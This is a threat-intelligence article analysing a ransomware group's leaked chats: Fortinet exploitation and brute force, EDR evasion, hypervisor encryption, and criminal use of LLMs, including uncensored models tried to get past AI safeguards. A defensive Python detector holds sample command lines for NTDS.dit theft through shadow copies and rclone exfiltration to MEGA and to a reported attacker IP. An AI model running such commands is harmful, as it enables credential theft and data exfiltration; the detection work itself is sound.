Evolution via Rebranding: Deconstructing ‘The Gentlemen’ Ransomware Leak

A deep dive into a recent data leak tied to The Gentlemen ransomware group reveals a sophisticated paradox in modern cybercrime: while their operational infrastructure and evasion techniques are undergoing rapid evolution, their foundational methods of intrusion remain stubbornly consistent with tactics observed over the last four years.

The leak provides a rare window into the continuity of threat actor identities. Evidence suggests that ransomware brands are often just “rebrands” rather than entirely new entities. For instance, a specific operator identified as “Tinker” has maintained a consistent operational profile across the lifecycle of Conti (2022), Black Basta (2025), and now The Gentlemen (2026), specializing in the critical trifecta of phishing, negotiation, and credential management. This continuity is further corroborated by shared infrastructure, specifically the use of the Matrix server bestflowers247.online, which serves as a persistent link between these disparate group identities.

Exploitation of the Edge: The Fortinet Connection

Despite shifting organizational identities, the initial access vector remains heavily reliant on vulnerable edge perimeter devices. The Gentlemen’s internal communications show an intense focus on Fortinet ecosystems, with over 80 documented references to FortiGate systems.

The group explicitly discussed the exploitation of CVE-2024-55591, a critical FortiOS authentication bypass vulnerability. Beyond sophisticated exploitation, they frequently resorted to low-effort brute-force attacks against approximately 1,000 Fortinet VPN instances, leveraging predictable credential patterns such as “gentlemen25.” This reliance on edge vulnerabilities mirrors the historical playbooks used by both Conti and Black Basta, highlighting a persistent defensive gap in perimeter security.

The Pragmatic Use of AI in Cybercrime

While much of the industry focuses on AI-generated malware, The Gentlemen demonstrate a more pragmatic, “human-in-the-loop” approach to Artificial Intelligence. Rather than using AI for code generation, actors are leveraging Large Language Models (LLMs) like ChatGPT and Claude to augment social engineering, automate victim communications, and streamline code translation for malware variants.

According to a report by Vectra AI—analyzed by Ransom-ISAC—the leak contains over 3,300 Rocket.Chat messages that detail these workflows. To bypass the safety guardrails of commercial AI, the group experimented with uncensored LLMs hosted on platforms like Hugging Face and utilized rented GPU clusters to facilitate large-scale data analysis of stolen information. However, internal sentiment suggests AI is viewed as a productivity multiplier rather than a replacement for human expertise.

The four leaks at a glance (Source: Vectra AI).

Advanced Evasion and Proprietary Tooling

The most significant area of innovation lies in the group’s transition away from “off-the-shelf” frameworks. The Gentlemen have moved beyond Cobalt Strike, opting instead for a bespoke Command-and-Control (C2) platform dubbed G-BOT. This custom framework supports SOCKS5 tunneling and utilizes legitimate file-sharing services like temp.sh and 0x0.st for payload delivery to blend in with normal web traffic.

Furthermore, their approach to Endpoint Detection and Response (EDR) evasion has shifted from avoidance to active subversion. The leak references highly technical bypass methods, including:

  • NTDLL unhooking to bypass API monitoring.
  • Direct syscall execution to evade user-mode hooks.
  • ETW (Event Tracing for Windows) patching to blind telemetry.
  • Manipulation of debug registers to disrupt debugger-based detection.

The maturity of this “evasion economy” is underscored by operator claims that specialized tools capable of neutralizing leading EDR solutions can be acquired on the underground market for approximately $5,000.

The Gentlemen (May 2026) (Source: Vectra AI).

Hypervisor Targeting and Post-Exploitation

A disturbing trend identified in the leak is the focus on hypervisor-level attacks. By targeting Hyper-V environments directly, The Gentlemen can encrypt virtual machine (VM) storage at the host level. This maneuver effectively bypasses any security monitoring residing within the guest OS, rendering traditional endpoint protection blind to the encryption process.

Once inside, the post-exploitation lifecycle follows a well-documented pattern of credential theft and data exfiltration:

  • Credential Harvesting: Use of LummaC2, Phemedrone Stealer, and DumpBrowserSecrets to scrape browser-stored data.
  • Domain Dominance: Extraction of the NTDS.dit file via Volume Shadow Copy to gain full domain administrative access.
  • Data Exfiltration: Utilizing rclone to move data through a Synology NAS staging server to cloud storage providers like MEGA.

CVEs mentioned by Black Basta (Source: Vectra AI).
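As an added defender-side illustration (not code from the report, Vectra AI or Ransom-ISAC), the Python below runs simple detection rules over constructed process-creation records for the chain described above: shadow-copy creation followed by an ntds.dit read on the same host, and rclone transfers to external remotes. Host names, user names and paths are assumptions; the 193.228.128.2:2222 and “d0wnloAd1” values are the indicators the article reports, placed into a constructed record.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records as (host, user, command line).
# None of these come from the leak; hosts, paths and remotes are illustrative.
SAMPLE_EVENTS = [
    ("dc01", r"CORP\svc-backup", r"vssadmin create shadow /for=C:"),
    ("dc01", r"CORP\svc-backup",
     r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\n.dit"),
    ("fs02", r"CORP\svc-backup", r"vssadmin create shadow /for=D:"),   # routine backup, no ntds.dit read
    ("ws07", r"CORP\jdoe", r"rclone copy D:\share mega:exfil --transfers 8"),
    ("nas-stage", "d0wnloAd1",   # staging NAS pushing to the endpoint the article reports
     r"rclone sync /volume1/stage :sftp,host=193.228.128.2,port=2222,user=d0wnloAd1:/drop"),
    ("ws03", r"CORP\asmith", r"vssadmin list shadows"),               # benign enumeration
]

# Each rule matches one step of the post-exploitation chain described above.
RULES = {
    "vss_create": re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow", re.I),
    "ntds_from_shadow": re.compile(r"HarddiskVolumeShadowCopy\d+.*\bntds\.dit\b", re.I),
    "rclone_remote": re.compile(r"\brclone(\.exe)?\b.*(?:^|\s|:)(mega|sftp|s3)[:,]", re.I),
}

def classify(cmdline):
    """Return the names of every rule that matches a single command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def detect(events):
    """Run the rules over events; return findings as (host, user, severity, reason)."""
    findings = []
    hits_by_host = defaultdict(set)
    for host, user, cmd in events:
        hits = classify(cmd)
        hits_by_host[host].update(hits)
        if "ntds_from_shadow" in hits:
            findings.append((host, user, "high", "ntds.dit read from a shadow copy"))
        if "rclone_remote" in hits:
            findings.append((host, user, "high", "rclone transfer to an external remote"))
    # Correlation: a shadow copy created AND ntds.dit read on the same host is the
    # VSS-based credential-theft chain; shadow creation alone (fs02) is routine backup.
    for host, hits in hits_by_host.items():
        if {"vss_create", "ntds_from_shadow"} <= hits:
            findings.append((host, "*", "critical", "NTDS.dit extraction via Volume Shadow Copy"))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The per-host correlation is what separates a domain controller being stripped of its credential store from a file server running its nightly backup; in production the rclone rule would additionally be scoped to accounts and hosts not authorised for cloud transfers.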

In one specific instance, an exposed configuration revealed active exfiltration to the IP 193.228.128.2 over port 2222, utilizing the account name “d0wnloAd1.”

The Constant Threat

The Gentlemen leak reinforces a sobering reality for cybersecurity professionals: while the “wrapper” of ransomware—its branding, its C2 frameworks, and its evasion techniques—is constantly evolving, the “core” remains the same. Exploiting unpatched edge devices, harvesting credentials, and abusing legitimate cloud tools for exfiltration continue to be highly effective. Innovation is concentrating on the ability to hide and scale, while the fundamental gaps in enterprise perimeter security remain the primary entry points.
